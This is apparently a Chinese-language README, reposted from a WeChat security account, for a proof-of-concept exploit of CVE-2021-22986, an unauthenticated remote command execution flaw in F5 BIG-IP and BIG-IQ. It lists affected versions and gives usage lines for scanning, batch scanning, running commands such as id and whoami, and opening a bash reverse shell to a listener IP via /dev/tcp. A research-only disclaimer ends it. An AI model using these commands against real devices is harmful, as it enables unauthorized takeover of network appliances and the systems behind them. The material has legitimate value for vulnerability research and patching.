自述文件
此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址访问iControl REST接口,从而可以执行任意系统命令,创建或删除文件以及禁用服务。此漏洞只能通过控制平面利用,而不能通过数据平面利用。剥削可能导致完全的系统危害。设备模式下的BIG-IP系统也容易受到攻击。
影响产品
-
F5 BIG-IQ 6.0.0-6.1.0
-
F5 BIG-IQ 7.0.0-7.0.0.1
-
F5 BIG-IQ 7.1.0-7.1.0.2
-
F5 BIG-IP 12.1.0-12.1.5.2
-
F5 BIG-IP 13.1.0-13.1.3.5
-
F5 BIG-IP 14.1.0-14.1.3.1
-
F5 BIG-IP 15.1.0-15.1.2
-
F5大IP 16.0.0-16.0.1
Vunl Check
基本用法
python3 CVE_2021_22986.py
外部扫描
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
命令执行:
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
批量扫描
python3 CVE_2021_22986.py -s true -f check.txt
备用壳
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
新POC
python3 newpoc.py https://192.168.174.164
参考
-
https://support.f5.com/csp/article/K03009991
-
https://github.com/safesword/F5_RCE
-
https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
本文始发于微信公众号(Ots安全):CVE - 2021 -22986 POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论